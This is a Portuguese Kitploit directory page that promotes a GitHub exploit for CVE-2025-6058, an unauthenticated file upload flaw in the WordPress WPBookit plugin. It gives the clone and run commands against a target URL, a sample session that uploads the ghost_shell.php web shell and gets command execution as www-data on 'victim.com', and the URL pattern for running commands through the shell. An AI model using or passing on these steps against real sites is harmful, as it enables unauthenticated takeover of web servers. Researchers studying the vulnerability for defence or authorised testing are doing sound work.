Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Exploit de Upload de Arquivo Não Autenticado | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2025-6058
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHub0xgh057r3c0n/cve-2025-6058

CVE-2025-6058

WordPress WPBookit ≤ 1.0.4 Exploit de Upload de Arquivo Não Autenticado

Ver Repositório
12há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Logótipo WordPress

🚨 CVE-2025-6058 — Exploit de Upload de Ficheiros Não Autenticado no WordPress WPBookit ≤ 1.0.4

Exploit de Upload Arbitrário de Ficheiros Não Autenticado que visa o Plugin WPBookit (≤ 1.0.4) do WordPress
O exploit permite o upload remoto de shell e a execução total de comandos.

Autor: 0xgh057r3c0n


📌 Sobre a Vulnerabilidade

O CVE-2025-6058 é uma vulnerabilidade crítica que afeta o plugin WPBookit no CMS WordPress. Um atacante não autenticado pode abusar de um endpoint AJAX vulnerável para carregar ficheiros PHP arbitrários, permitindo .

Execução Remota de Código (RCE)
  • 🎯 Alvo: CMS WordPress (plugin WPBookit vulnerável)
  • 📦 Plugin Afetado: WPBookit ≤ 1.0.4
  • ⚠️ Nível de Risco: Crítico (RCE Não Autenticado)

✨ Funcionalidades

  • 🔍 Deteta automaticamente a versão do plugin WordPress através do README.txt
  • 📤 Carrega uma shell PHP leve (ghost_shell.php)
  • 🖥️ Shell interativa (prompt estilo Parrot)
  • 🌐 Não autenticado — Sem necessidade de login
  • 🎨 Saída CLI colorida

🚀 Guia de Utilização

💻 Requisitos

root@kitploit:~
python3 --version
pip install requests

⚙️ Execução do Exploit

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com

🛠️ Exemplo de Sessão de Shell

root@kitploit:~
python3 CVE-2025-6058.py -u https://victim.com

[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.

[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] Interactive GhostShell Started — type 'exit' to quit.

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data

📂 Detalhes da Shell

  • Nome do Ficheiro: ghost_shell.php
  • Caminho: /wp-content/uploads/YYYY/MM/ghost_shell.php
  • Exemplo:
root@kitploit:~
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

⚠️ Aviso Legal

Este exploit foi desenvolvido apenas para fins educacionais e testes de penetração autorizados. A utilização não autorizada contra sistemas sem consentimento explícito é ilegal.


📄 Licença

Distribuído sob a Licença MIT


Feito para auditoria de segurança do WordPress 🛡️ por 0xgh057r3c0n

Baixar ferramenta